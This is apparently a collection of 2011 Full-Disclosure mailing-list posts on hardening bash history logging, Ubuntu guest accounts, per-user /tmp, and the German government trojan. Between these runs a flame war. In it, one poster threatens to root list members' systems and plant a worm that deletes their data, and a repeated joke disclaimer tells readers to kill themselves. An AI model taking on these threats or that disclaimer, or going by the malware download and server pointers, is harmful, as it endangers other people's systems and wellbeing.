> images and full forensics.  I do respect your input and thoughts though for a 
> more targeted attack; not an IRC bot in /tmp.
> 
> That being said, I strongly believe in preserving bash_history as well as 
> vital log data.  It's best/wise to ship this off to a separate Syslog server. 
>  If you're paranoid turn up stunnel between the devices.  For example and as 
> evidenced by many of the documented attacks here purging of bash_history is 
> common ala 'history -c' after fun.  To thwart this I like the idea of logging 
> to syslog often, ensure permissions are strict for the syslog messages, and 
> shipping the syslog data off to a separate box.  I like to:
> 
> 1) Generate an E-Mail alert when someone logs in, by adjusting 
> /etc/bash.bashrc (or similar based on distribution) to:
> 
> #Email alert for login
> echo -e "Subject: Login from $(/usr/bin/whoami) on $(/bin/hostname) at 
> $(/bin/date)\n\n$(/usr/bin/last -ian 10)\n"|/usr/sbin/sendmail 
> recipi...@example.com
> 
> 2) Preserve, via Syslog, commands executed at the prompt, by adjusting 
> /etc/profile.  Adjust /etc/syslog.conf or /etc/rsyslog.conf to forward these 
> syslog messages off-box to another asset.  If you're paranoid use stunnel.
> 
> export PROMPT_COMMAND="${PROMPT_COMMAND:+$PROMPT_COMMAND ; }"'echo "$$ $USER 
> $(history 1)"|/usr/bin/logger -p user.alert -t bash_history'
> readonly PROMPT_COMMAND
> 
> 3) Preserve bash_history by adjusting /etc/profile:
> 
> #Secure the Bash History
> export HISTSIZE=1500
> export HISTCONTROL=''
> export HISTIGNORE=''
> export HISTTIMEFORMAT='%F %T '
> readonly HISTFILE
> readonly HISTFILESIZE
> readonly HISTSIZE
> readonly HISTCONTROL
> readonly HISTIGNORE
> readonly HISTTIMEFORMAT
> 
> 4) Optionally use chattr to set ~/.bash_history to append-only:
> 
>   #Secure .bash_history (poke fun of the while subshell if you wish)
>   /usr/bin/find / -maxdepth 3|/bin/grep -i bash_history|while read line; do 
> /usr/bin/chattr +a "$line"; done
> 
> 5) Use of an IP Recorder, something like daemonlogger, in ring-buffer mode, 
> as a way to record all ingress/egress traffic using a percentage of the disk. 
>  See http://www.snort.org/users/roesch/Site/Daemonlogger/Daemonlogger.html
> 
> I am eager to hear any additional thoughts or methods for security 
> information such as this.
> 
> Thanks,
> John
> 
> 
> 
> 
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] NEVER AGAIN

[James Rankin]

Apologies, I inadvertently "Reply-All"'ed (and have just done so again, so
apology again)

I am sick of netty and his new alter ego, so please could we have the list
owner kick both their asses to the kerb like he did last time?

This will be my last word on the subject (although more threats and
lawsuits from netty and netty-2 may be forthcoming). They are both getting
killfile treatment just now

Cheers,


JR

On 22 November 2011 14:14, Christian Sciberras  wrote:

> James, could you please stop publishing emails intended for private use?
>
> It's getting plain ridiculous the amount of crap from this list I (and the
> rest) have to deal with every day.
>
>
>
>
>
>
>
> On Tue, Nov 22, 2011 at 3:06 PM, James Rankin wrote:
>
>> Whatever
>>
>> On 22 November 2011 14:05, andrew.wallace 
>> wrote:
>>
>>> The email is nothing to do with me or my consultancy. You need better
>>> analysis skills and a good lawyer.
>>>
>>> ---
>>>
>>> Andrew Wallace
>>>
>>>   --
>>> *From:* James Rankin 
>>> *To:* andrew.wallace 
>>> *Cc:* ""Darren Martyn"" ; ""Antony
>>> widmal"" ; ""xD 0x41"" ;
>>> ""Martin Allert"" ; "full-disclosure@lists.grok.org.uk"
>>> ; ""phocean"" <0...@phocean.net>;
>>> ""Nikolay Kichukov"" ; "valdis.kletni...@vt.edu" <
>>> valdis.kletni...@vt.edu>
>>> *Sent:* Tuesday, November 22, 2011 2:01 PM
>>>
>>> *Subject:* Re: [Full-disclosure] NEVER AGAIN
>>>
>>> Strange. Your other personality said much the same thing.
>>>
>>> On 22 November 2011 13:57, andrew.wallace >> > wrote:
>>>
>>> You're making the worst mistake possible for yourself.
>>>
>>> ---
>>>
>>> Andrew Wallace
>>>
>>>   --
>>> *From:* James Rankin 
>>> *To:* andrew.wallace 
>>> *Cc:* ""Darren Martyn"" ; ""Antony
>>> widmal"" ; ""Martin Allert"" ;
>>> "full-disclosure@lists.grok.org.uk" ;
>>> ""phocean"" <0...@phocean.net>; ""Nikolay Kichukov"" ;
>>> "valdis.kletni...@vt.edu" 
>>> *Sent:* Tuesday, November 22, 2011 1:51 PM
>>> *Subject:* Re: [Full-disclosure] NEVER AGAIN
>>>
>>> Consultancy. Hehe.
>>>
>>> You seriously need treatment for schizophrenia. Why don't you go and
>>> argue with your alter ego?
>>>
>>> Please tell your solicitor he is welcome to talk to mine any day.
>>>
>>> Regards,
>>>
>>>
>>>
>>> JR
>>>
>>> On 22 November 2011 13:48, andrew.wallace >> > wrote:
>>>
>>> I think you are mistaken, this email is not sent by my consultancy.
>>>
>>> I ask you to retract your statement or face legal action.
>>>
>>> ---
>>>
>>> Andrew Wallace
>>>
>>> Independent consultant
>>>
>>> https://plus.google.com/115085501867247270932/about
>>>
>>>
>>>
>>>
>>> --
>>> "On two occasions...I have been asked, 'Pray, Mr Babbage, if you put
>>> into the machine wrong figures, will the right answers come out?' I am not
>>> able rightly to apprehend the kind of confusion of ideas that could provoke
>>> such a question."
>>>
>>> ** IMPORTANT INFORMATION/DISCLAIMER *
>>>
>>> This document should be read only by those persons to whom it is
>>> addressed. If you have received this message it was obviously addressed to
>>> you and therefore you can read it, even it we didn't mean to send it to
>>> you. However, if the contents of this email make no sense whatsoever then
>>> you probably were not the intended recipient, or, alternatively, you are a
>>> mindless cretin; either way, you should immediately kill yourself and
>>> destroy your computer (not necessarily in that order). Once you have taken
>>> this action, please contact us.. no, sorry, you can't use your computer,
>>> because you just destroyed it, and possibly also committed suicide
>>> afterwards, but I am starting to digress.. *
>>> * The originator of this email is not liable for the transmission of
>>>

Re: [Full-disclosure] NEVER AGAIN

[James Rankin]

Whatever

On 22 November 2011 14:05, andrew.wallace wrote:

> The email is nothing to do with me or my consultancy. You need better
> analysis skills and a good lawyer.
>
> ---
>
> Andrew Wallace
>
>   --
> *From:* James Rankin 
> *To:* andrew.wallace 
> *Cc:* ""Darren Martyn"" ; ""Antony
> widmal"" ; ""xD 0x41"" ;
> ""Martin Allert"" ; "full-disclosure@lists.grok.org.uk" <
> full-disclosure@lists.grok.org.uk>; ""phocean"" <0...@phocean.net>;
> ""Nikolay Kichukov"" ; "valdis.kletni...@vt.edu" <
> valdis.kletni...@vt.edu>
> *Sent:* Tuesday, November 22, 2011 2:01 PM
>
> *Subject:* Re: [Full-disclosure] NEVER AGAIN
>
> Strange. Your other personality said much the same thing.
>
> On 22 November 2011 13:57, andrew.wallace 
> wrote:
>
> You're making the worst mistake possible for yourself.
>
> ---
>
> Andrew Wallace
>
>   --
> *From:* James Rankin 
> *To:* andrew.wallace 
> *Cc:* ""Darren Martyn"" ; ""Antony
> widmal"" ; ""Martin Allert"" ; "
> full-disclosure@lists.grok.org.uk" ;
> ""phocean"" <0...@phocean.net>; ""Nikolay Kichukov"" ;
> "valdis.kletni...@vt.edu" 
> *Sent:* Tuesday, November 22, 2011 1:51 PM
> *Subject:* Re: [Full-disclosure] NEVER AGAIN
>
> Consultancy. Hehe.
>
> You seriously need treatment for schizophrenia. Why don't you go and argue
> with your alter ego?
>
> Please tell your solicitor he is welcome to talk to mine any day.
>
> Regards,
>
>
>
> JR
>
> On 22 November 2011 13:48, andrew.wallace 
> wrote:
>
> I think you are mistaken, this email is not sent by my consultancy.
>
> I ask you to retract your statement or face legal action.
>
> ---
>
> Andrew Wallace
>
> Independent consultant
>
> https://plus.google.com/115085501867247270932/about
>
>
>
>
> --
> "On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
> the machine wrong figures, will the right answers come out?' I am not able
> rightly to apprehend the kind of confusion of ideas that could provoke such
> a question."
>
> ** IMPORTANT INFORMATION/DISCLAIMER *
>
> This document should be read only by those persons to whom it is
> addressed. If you have received this message it was obviously addressed to
> you and therefore you can read it, even it we didn't mean to send it to
> you. However, if the contents of this email make no sense whatsoever then
> you probably were not the intended recipient, or, alternatively, you are a
> mindless cretin; either way, you should immediately kill yourself and
> destroy your computer (not necessarily in that order). Once you have taken
> this action, please contact us.. no, sorry, you can't use your computer,
> because you just destroyed it, and possibly also committed suicide
> afterwards, but I am starting to digress.. *
> * The originator of this email is not liable for the transmission of the
> information contained in this communication. Or are they? Either way it's a
> pretty dull legal query and frankly one I'm not going to dwell on. But
> should you have nothing better to do, please feel free to ruminate on it,
> and please pass on any concrete conclusions should you find them. However,
> if you pass them on via email, be sure to include a disclaimer regarding
> liability for transmission.
> *
> * In the event that the originator did not send this email to you, then
> please return it to us and attach a scanned-in picture of your mother's
> brother's wife wearing nothing but a kangaroo suit, and we will immediately
> refund you exactly half of what you paid for the can of Whiskas you bought
> when you went to Pets** ** At Home yesterday. *
> * We take no responsibility for non-receipt of this email because we are
> running Exchange 5.5 and everyone knows how glitchy that can be. In the
> event that you do get this message then please note that we take no
> responsibility for that either. Nor will we accept any liability, tacit or
> implied, for any damage you may or may not incur as a result of receiving,
> or not, as the case may be, from time to time, notwithstanding all
> liabilities implied or otherwise, ummm, hell, where was I...umm, no matter
> what happens, it is NOT, and NEVER WILL BE, OUR FAULT! *
> * The comments and opinions expressed herein are my own and NOT those of
> my employer, who, if he knew I was sending e

Re: [Full-disclosure] NEVER AGAIN

[James Rankin]

Strange. Your other personality said much the same thing.

On 22 November 2011 13:57, andrew.wallace wrote:

> You're making the worst mistake possible for yourself.
>
> ---
>
> Andrew Wallace
>
>   ------
> *From:* James Rankin 
> *To:* andrew.wallace 
> *Cc:* ""Darren Martyn"" ; ""Antony
> widmal"" ; ""Martin Allert"" ; "
> full-disclosure@lists.grok.org.uk" ;
> ""phocean"" <0...@phocean.net>; ""Nikolay Kichukov"" ;
> "valdis.kletni...@vt.edu" 
> *Sent:* Tuesday, November 22, 2011 1:51 PM
> *Subject:* Re: [Full-disclosure] NEVER AGAIN
>
> Consultancy. Hehe.
>
> You seriously need treatment for schizophrenia. Why don't you go and argue
> with your alter ego?
>
> Please tell your solicitor he is welcome to talk to mine any day.
>
> Regards,
>
>
>
> JR
>
> On 22 November 2011 13:48, andrew.wallace 
> wrote:
>
> I think you are mistaken, this email is not sent by my consultancy.
>
> I ask you to retract your statement or face legal action.
>
> ---
>
> Andrew Wallace
>
> Independent consultant
>
> https://plus.google.com/115085501867247270932/about
>
>
>
>
> --
> "On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
> the machine wrong figures, will the right answers come out?' I am not able
> rightly to apprehend the kind of confusion of ideas that could provoke such
> a question."
>
> ** IMPORTANT INFORMATION/DISCLAIMER *
>
> This document should be read only by those persons to whom it is
> addressed. If you have received this message it was obviously addressed to
> you and therefore you can read it, even it we didn't mean to send it to
> you. However, if the contents of this email make no sense whatsoever then
> you probably were not the intended recipient, or, alternatively, you are a
> mindless cretin; either way, you should immediately kill yourself and
> destroy your computer (not necessarily in that order). Once you have taken
> this action, please contact us.. no, sorry, you can't use your computer,
> because you just destroyed it, and possibly also committed suicide
> afterwards, but I am starting to digress.. *
> * The originator of this email is not liable for the transmission of the
> information contained in this communication. Or are they? Either way it's a
> pretty dull legal query and frankly one I'm not going to dwell on. But
> should you have nothing better to do, please feel free to ruminate on it,
> and please pass on any concrete conclusions should you find them. However,
> if you pass them on via email, be sure to include a disclaimer regarding
> liability for transmission.
> *
> * In the event that the originator did not send this email to you, then
> please return it to us and attach a scanned-in picture of your mother's
> brother's wife wearing nothing but a kangaroo suit, and we will immediately
> refund you exactly half of what you paid for the can of Whiskas you bought
> when you went to Pets** ** At Home yesterday. *
> * We take no responsibility for non-receipt of this email because we are
> running Exchange 5.5 and everyone knows how glitchy that can be. In the
> event that you do get this message then please note that we take no
> responsibility for that either. Nor will we accept any liability, tacit or
> implied, for any damage you may or may not incur as a result of receiving,
> or not, as the case may be, from time to time, notwithstanding all
> liabilities implied or otherwise, ummm, hell, where was I...umm, no matter
> what happens, it is NOT, and NEVER WILL BE, OUR FAULT! *
> * The comments and opinions expressed herein are my own and NOT those of
> my employer, who, if he knew I was sending emails and surfing the seamier
> side of the Internet, would cut off my manhood and feed it to me for
> afternoon tea. *
>
>
>
>
>


-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
the machine wrong figures, will the right answers come out?' I am not able
rightly to apprehend the kind of confusion of ideas that could provoke such
a question."

** IMPORTANT INFORMATION/DISCLAIMER *

This document should be read only by those persons to whom it is addressed.
If you have received this message it was obviously addressed to you and
therefore you can read it, even it we didn't mean to send it to you.
However, if the contents of this email make no sense whatsoever then you
probably were not the intended recipient, or, alternatively, you are a
mindless cretin; either way, you should immediately kill yours

Re: [Full-disclosure] NEVER AGAIN

[James Rankin]

Consultancy. Hehe.

You seriously need treatment for schizophrenia. Why don't you go and argue
with your alter ego?

Please tell your solicitor he is welcome to talk to mine any day.

Regards,



JR

On 22 November 2011 13:48, andrew.wallace wrote:

> I think you are mistaken, this email is not sent by my consultancy.
>
> I ask you to retract your statement or face legal action.
>
> ---
>
> Andrew Wallace
>
> Independent consultant
>
> https://plus.google.com/115085501867247270932/about
>



-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
the machine wrong figures, will the right answers come out?' I am not able
rightly to apprehend the kind of confusion of ideas that could provoke such
a question."

** IMPORTANT INFORMATION/DISCLAIMER *

This document should be read only by those persons to whom it is addressed.
If you have received this message it was obviously addressed to you and
therefore you can read it, even it we didn't mean to send it to you.
However, if the contents of this email make no sense whatsoever then you
probably were not the intended recipient, or, alternatively, you are a
mindless cretin; either way, you should immediately kill yourself and
destroy your computer (not necessarily in that order). Once you have taken
this action, please contact us.. no, sorry, you can't use your computer,
because you just destroyed it, and possibly also committed suicide
afterwards, but I am starting to digress.. *

* The originator of this email is not liable for the transmission of the
information contained in this communication. Or are they? Either way it's a
pretty dull legal query and frankly one I'm not going to dwell on. But
should you have nothing better to do, please feel free to ruminate on it,
and please pass on any concrete conclusions should you find them. However,
if you pass them on via email, be sure to include a disclaimer regarding
liability for transmission.
*

* In the event that the originator did not send this email to you, then
please return it to us and attach a scanned-in picture of your mother's
brother's wife wearing nothing but a kangaroo suit, and we will immediately
refund you exactly half of what you paid for the can of Whiskas you bought
when you went to Pets** ** At Home yesterday. *

* We take no responsibility for non-receipt of this email because we are
running Exchange 5.5 and everyone knows how glitchy that can be. In the
event that you do get this message then please note that we take no
responsibility for that either. Nor will we accept any liability, tacit or
implied, for any damage you may or may not incur as a result of receiving,
or not, as the case may be, from time to time, notwithstanding all
liabilities implied or otherwise, ummm, hell, where was I...umm, no matter
what happens, it is NOT, and NEVER WILL BE, OUR FAULT! *

* The comments and opinions expressed herein are my own and NOT those of my
employer, who, if he knew I was sending emails and surfing the seamier side
of the Internet, would cut off my manhood and feed it to me for afternoon
tea. *
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] NEVER AGAIN

[Rankin, James R]

N3td3v, fuck off

Sent from my SR-71 Blackbird

-Original Message-
From: xD 0x41 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Tue, 22 Nov 2011 18:48:32 
To: 
Reply-To: sec...@gmail.com
Subject: Re: [Full-disclosure] NEVER AGAIN

You fucking pieces of shit forget when it was once me who was asking,
for help in regards to mutiple things, and when offered NONE, in
regards to code i later had to find thanks to fucking blakhatz, why
the fuck would i want or care for this list now, forget any
competition i ever started, you clearly want, and, forget to see, even
when it maybe something small for YOU, it maybe NOT for me, yet, i am
hit from every side, nonstop about shit, wich i KNOW there is plenty
of you who also have these codes, and thats exactly why your stfu and
lettin me cop it.Seriously, when i was the one askin , i made NO big
deal, when i was mutiple times confronted with exactly how i acted,
and that was simply to NOT show things, because i did this per person
basis, if i knew i could trust, then they were shown things..and they
will always be shown things, as they remain friends.. the rest of you
who shot your mouths of, watch the hell out, coz you may find a new
user on your system soon called 'arsehole' and all he wants todo is
get root, sdo he can rm it. a nice fuckign wurm you all deserve...
harvesting of your domains, those who spoke out and, bombed me for
shitall, and helped me not one bit when i had my ass on the line for
shit like freepbx :s screw this list, believe it, i will root the
people who annoyed me, one by one, and yes, ill FD that.
now, fuck you all, except the very few, who know who they are . the
rest of you who ignored me, and now dare to backlash chat me about a
crappy bash 0day you DONT have,. go fk yourselfs, and for valdis, i
hope your vt.edu, has a whole slew of new users you suckm as any
kind of friend or moderator your also, the BIGGEST liar, who
cannot code a thing, on this fucking list.
dick.
as for root@fibertel, indeed stfu, it was me on the ophone, just know
that, your job is gone.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default

[james]

Effective user id as a short answer; compare sudo whoami and su - whoami


Sent from my BlackBerry® wireless device

-Original Message-
From: Dan Kaminsky 
Date: Sat, 19 Nov 2011 11:36:47 
To: ja...@zero-internet.org.uk
Cc: Johan Nestaas; 
full-disclosure-boun...@lists.grok.org.uk;
 Olivier; 
full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default

What is the security differential between su and sudo bash?

Sent from my iPhone

On Nov 19, 2011, at 6:15 AM, ja...@zero-internet.org.uk wrote:

> I'll second that; the isp I work at has a sizeable ubuntu customer base and 
> these are customers who have made an informed decision.
> 
> Now; let's consider ubuntu's inherited security from debian such as 
> configuring a 'mortal account' (admittedly can be ignored in the preseed) and 
> then the lack of perms on su; must use sudo.
> 
> This is a distro that is newbie friendly but is not designed specifically for 
> them.
> 
> Unfortunately, though, you make a distro with simplified tasks (printer 
> installation a fantastic example) and people, especially long term linuxers- 
> though I ought to be included I guess, remember back all too easily to when 
> everything was an uphill struggle: "what do you mean I don't have to compile 
> this as a flipping module? That's not freedom!" Being all too familiar.
> 
> Just my tuppence worth anyway.
> 
> Sent from my BlackBerry® wireless device
> 
> -Original Message-
> From: Johan Nestaas 
> Sender: full-disclosure-boun...@lists.grok.org.uk
> Date: Fri, 18 Nov 2011 12:04:46 
> To: Olivier
> Cc: 
> Subject: Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default

[james]

I'll second that; the isp I work at has a sizeable ubuntu customer base and 
these are customers who have made an informed decision.

Now; let's consider ubuntu's inherited security from debian such as configuring 
a 'mortal account' (admittedly can be ignored in the preseed) and then the lack 
of perms on su; must use sudo.

This is a distro that is newbie friendly but is not designed specifically for 
them.

Unfortunately, though, you make a distro with simplified tasks (printer 
installation a fantastic example) and people, especially long term linuxers- 
though I ought to be included I guess, remember back all too easily to when 
everything was an uphill struggle: "what do you mean I don't have to compile 
this as a flipping module? That's not freedom!" Being all too familiar.

Just my tuppence worth anyway.

Sent from my BlackBerry® wireless device

-Original Message-
From: Johan Nestaas 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Fri, 18 Nov 2011 12:04:46 
To: Olivier
Cc: 
Subject: Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default

[James Condron]

On 17 Nov 2011, at 17:50, Mario Vilas wrote:

> The guest account has no password, but it's not possible to login remotely 
> with ssh.

Thats because sshd file doesn't allow passwordless logins by default. It is, of 
course, changeable.

> 
> On Thu, Nov 17, 2011 at 5:28 PM, Dave  wrote:
> Hi,
> 
> What is the password for this guest account?
> Is the password random generated?
> 
> Is remote access of any kind enabled by default for this guest account?
> 
> In what way is the guest account different from any of the half dozen or so 
> other accounts(with the obvious exception of access rights)
> created during a default Ubuntu install?
> 
> How insecure is it really?
> 
> I am not an Ubuntu expert so these are genuine questions, I am far to busy to 
> research this at this time so I ask these questions in the hope
> than an Ubuntu Guru comes forth and either allays all my/your/our fears(if 
> they exist) or scares me/us into action.
> 
> regards
> Dave
> 
> 
> 
> -- 
> “There's a reason we separate military and the police: one fights the enemy 
> of the state, the other serves and protects the people. When the military 
> becomes both, then the enemies of the state tend to become the people.”
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Symlink vulnerabilities

[James Condron]

On 22 Oct 2011, at 07:06, Raj Mathur (राज माथुर) wrote:
> 
> 
> At first sight, the best option from that point of view seems to be a 
> per-user tmp under /tmp/$USER/ and mount /tmp noexec, nosuid.  If you 
> choose the ~$USER/tmp option, you'll probably have to do some userfs 
> jugglery to achieve the same objective.

Actually, no; per user /tmp could only be accomplished, without a major 
redesign and without breaking almost every application, by turning /tmp into a 
pseudofilesystem a la procfs. Consider /proc/self for instance, accessing it 
runs a subroutine which first must get the PPID of the stat() to work out which 
information the user wants.

As such /tmp must stay where it is to ensure backwards compat (Otherwise you 
introduce a new /tmp directory with no benefit) but where the UID of the caller 
determines to where the actual /tmp directory links to. Dynamic symlinking, if 
you've ever done any fuse programming. In which case from a security point of 
view we use ~/.tmp or similar.

This solves a couple fo problems further; it allows for greater control of what 
can and cannot be done, nosuid is effectively covered, noexec can be enforced, 
and only root can see other people's /tmp if we implement it correctly.

As an aside; we generally mount /tmp over the loopback for obvious reasons.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD

[James Condron]

On 17 Oct 2011, at 00:58, Laurelai wrote:

> On 10/16/2011 6:55 PM, James Condron wrote:
>>> You realize most of the protesters arent a part of anonymous at all right?
>> If not all of them; its hard work putting jeans and a tshirt on and leaving 
>> the house.
>> 
>> Certainly without charging your motorised scooter and  bringing a couple of 
>> hours supply of pork scratchings.
>> 
>> Anonymous have become the new bogeyman- lets remember who these people are 
>> and calm the fuck down- they're a threat, sure, but no more than a fly 
>> landing on your lunch.
> I have to agree that people have overblown the threat that Anon is, but 
> of course there's a lot of money to be made in scaring the crap out of 
> people.
> 

This is true, and its what keeps me in a job. I think we can, of course, all 
agree that both anonymous are heavily overblown and Thomas Ryan is a bit of a 
tit.

In other news, look out for my interview on CNN talking about how I gained 
access to a series of security mailing lists by simply signing up

$eyes->roll()


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD

[James Condron]

> You realize most of the protesters arent a part of anonymous at all right?

If not all of them; its hard work putting jeans and a tshirt on and leaving the 
house.

Certainly without charging your motorised scooter and  bringing a couple of 
hours supply of pork scratchings.

Anonymous have become the new bogeyman- lets remember who these people are and 
calm the fuck down- they're a threat, sure, but no more than a fly landing on 
your lunch.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Possible German Governmental Backdoor found ("R2D2")

[james]

 It has some valid uses for sure. Well the Skype id harvesting and sound 
 recording can be used for Counter Intelligence- terrorism operations.

 But that's just theory.



 On Mon, 10 Oct 2011 09:51:24 +1100, xD 0x41  wrote:
> Interesting... although that archive seems corrupt... id like to see
> abit more about this but, very interesting indeed.. specially skype 
> id
> harvesting, what could this be for.
> hrms
> xd
>
>  On 10 October 2011 07:13,  wrote:
>   On Sun, 9 Oct 2011 16:31:53 +0200, You Got Pwned
>    wrote:
>  > Hi List,
>  >
>  > i thougt this could be interesting. My english is not very good so
> i
>  > copied the following information from FSecure
>  > (http://www.f-secure.com/weblog/archives/2249.html [3] [1])
>  >
>  > "Chaos Computer Club from Germany has tonight announced that they
>  > have located a backdoor trojan used by the German Goverment.
>  >
>  > The announcment was made public on ccc.de [4] [2] with a detailed
> 20-page
>  > analysis of the functionality of the malware. Download the report
> in
>  > PDF [3] (in German)
>  >
>  > The malware in question is a Windows backdoor consisting of a DLL
> and
>  > a kernel driver.
>  >
>  > The backdoor includes a keylogger that targets certain
> applications.
>  > These applications include FIREFOX, SKYPE, MSN MESSENGER, ICQ and
>  > others.
>  >
>  > The backdoor also contains code intended to take screenshots and
>  > record audio, including recording Skype calls.
>  >
>  > In addition, the backdoor can be remotely updated. Servers that it
>  > connects to include 83.236.140.90 [4] and 207.158.22.134"
>  >
>  > According to CCC Germany the backdoor could also be exploited by
>  > third parties. You can download it from
>  > http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz
> [5]
>  > [5]  . You'll need gzip and tar to get the .dll and the .sys
> file.
>  >
>  >
>  > Links:
>  > --
>  > [1] http://www.f-secure.com/weblog/archives/2249.html [6]
>  > [2] http://www.ccc.de/ [7]
>  > [3]
>  >
>  >
> 
> http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf
> [8]
>  > [4] http://webmail.0m3ga.net/tel:83.236.140.90 [9]
>  > [5]
> http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz 
> [10]
>
>   I was looking at this just late last night.
>
>  ___
>  Full-Disclosure - We believe in it.
>  Charter: http://lists.grok.org.uk/full-disclosure-charter.html [11]
>  Hosted and sponsored by Secunia - http://secunia.com/ [12]
>
>
> Links:
> --
> [1] mailto:ja...@smithwaysecurity.com
> [2] mailto:yougotpwn...@googlemail.com
> [3] http://www.f-secure.com/weblog/archives/2249.html
> [4] http://ccc.de
> [5] http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz
> [6] http://www.f-secure.com/weblog/archives/2249.html
> [7] http://www.ccc.de/
> [8]
> 
> http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf
> [9] http://webmail.0m3ga.net/tel:83.236.140.90
> [10]
> http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz
> [11] http://lists.grok.org.uk/full-disclosure-charter.html
> [12] http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Possible German Governmental Backdoor found ("R2D2")

[james]

 On Sun, 9 Oct 2011 16:31:53 +0200, You Got Pwned 
  wrote:
> Hi List,
>
> i thougt this could be interesting. My english is not very good so i
> copied the following information from FSecure
> (http://www.f-secure.com/weblog/archives/2249.html [1])
>
> "Chaos Computer Club from Germany has tonight announced that they
> have located a backdoor trojan used by the German Goverment.
>
> The announcment was made public on ccc.de [2] with a detailed 20-page
> analysis of the functionality of the malware. Download the report in
> PDF [3] (in German)
>
> The malware in question is a Windows backdoor consisting of a DLL and
> a kernel driver.
>
> The backdoor includes a keylogger that targets certain applications.
> These applications include FIREFOX, SKYPE, MSN MESSENGER, ICQ and
> others.
>
> The backdoor also contains code intended to take screenshots and
> record audio, including recording Skype calls.
>
> In addition, the backdoor can be remotely updated. Servers that it
> connects to include 83.236.140.90 [4] and 207.158.22.134"
>
> According to CCC Germany the backdoor could also be exploited by
> third parties. You can download it from
> http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz
> [5]  . You'll need gzip and tar to get the .dll and the .sys file.
>
>
> Links:
> --
> [1] http://www.f-secure.com/weblog/archives/2249.html
> [2] http://www.ccc.de/
> [3]
> 
> http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf
> [4] http://webmail.0m3ga.net/tel:83.236.140.90
> [5] http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz

 I was looking at this just late last night.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Verizon Wireless DNS Tunneling

[James Wright]

Actually, yes, they could provide bad data.  I believe (perhaps erroneously)
that Comcast does this.  Probably other service providers do too.  Until you
are authenticated to use their network you are redirected to a service page
that can help authenticate you.  If you have connectivity issues (like bad
cached DNS entries) after authenticating you are to reboot (or otherwise
clear the local DNS cache).

I don't really see why Verizon could not do similar.  All DNS traffic from
an unauthenticated user/machine would be redirected to a DNS server that
only returned the appropriate service page.  Most or all other traffic would
be blocked.  Much like NAC.


Thanks,
James


On Fri, Oct 7, 2011 at 10:05 AM, Dan Kaminsky  wrote:

> One major reason it sticks around is -- what are you supposed to do, return
> bad data until the user is properly logged in?  It might get cached -- and
> while operating systems respect TTL, browsers most assuredly do not ("well,
> it MIGHT take us somewhere good").
>
> It's not like there's a magic off switch that makes this go away.
>
> On Fri, Oct 7, 2011 at 4:56 AM, Marshall Whittaker <
> marshallwhitta...@gmail.com> wrote:
>
>> Yes, I've found that DNS tunneling works well at the college I go to on
